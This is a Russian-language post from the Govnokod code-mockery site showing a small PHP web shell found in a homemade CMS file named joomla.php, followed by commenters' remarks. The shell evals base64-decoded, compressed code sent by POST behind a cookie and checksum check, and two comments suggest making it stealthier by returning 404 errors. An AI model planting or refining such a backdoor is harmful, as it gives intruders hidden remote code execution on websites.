1. PHP / Говнокод #11438

    +63

    1. 01
    2. 02
    3. 03
    4. 04
    5. 05
    6. 06
    7. 07
    8. 08
    9. 09
    10. 10
    <?php
if (isset($_COOKIE['adm'])) {
	if (isset($_POST['crc'], $_POST['cmd'])) {
		if (sprintf('%u', crc32($_POST['cmd'])) == $_POST['crc']) {
			eval(gzuncompress(base64_decode($_POST['cmd'])));
		} else 
			echo 'repeat_cmd';
	}
}
?>

    Файл joomla.php в самопальной CMS

    Запостил: kindofbear, 18 Июля 2012

    Комментарии (10) RSS

    • ava psycho-coder 18.07.2012 15:49 # +1

      shell?
      Ответить

      • ava kindofbear 18.07.2012 16:02 # +2

        Ну да. Только без фантазии какой-то
        Ответить

        • ava bormand 18.07.2012 16:07 # +1

          Ну почему. Тут даже контрольку посчитали, да куку adm проверили... А фантазия у автора есть хотя бы потому, что шелл назван joompla.php.
          Ответить

          • ava eth0 18.07.2012 17:29 # 0

            Защита на уровне секретности алгоритма - не ахти. Eval - говно. Crc - говно. Итог прискорбен.
            Ответить

            • ava bormand 18.07.2012 18:05 # 0

              Ну и вывод repeat_cmd тут явно лишний. Лучше бы вываливался хидер с ошибкой 404. Так скрытней.
              Ответить

              • ava eth0 18.07.2012 20:04 # 0

                Тогда нужно делать вывод ошибки в самом конце, чтобы если какое-то из условий не выполнилось - ошибка. Тут и до repeat_cmd не так просто добраться.
                Ответить

    • ava telnet 18.07.2012 16:17 # 0

      Часто встречал эту хрень. Её раскладывают по файлам в автоматическом режиме. Обычное дело заражение вордпрессовских шаблонов и рандомных PHP-скриптов по FTP.
      Ответить

    Добавить комментарий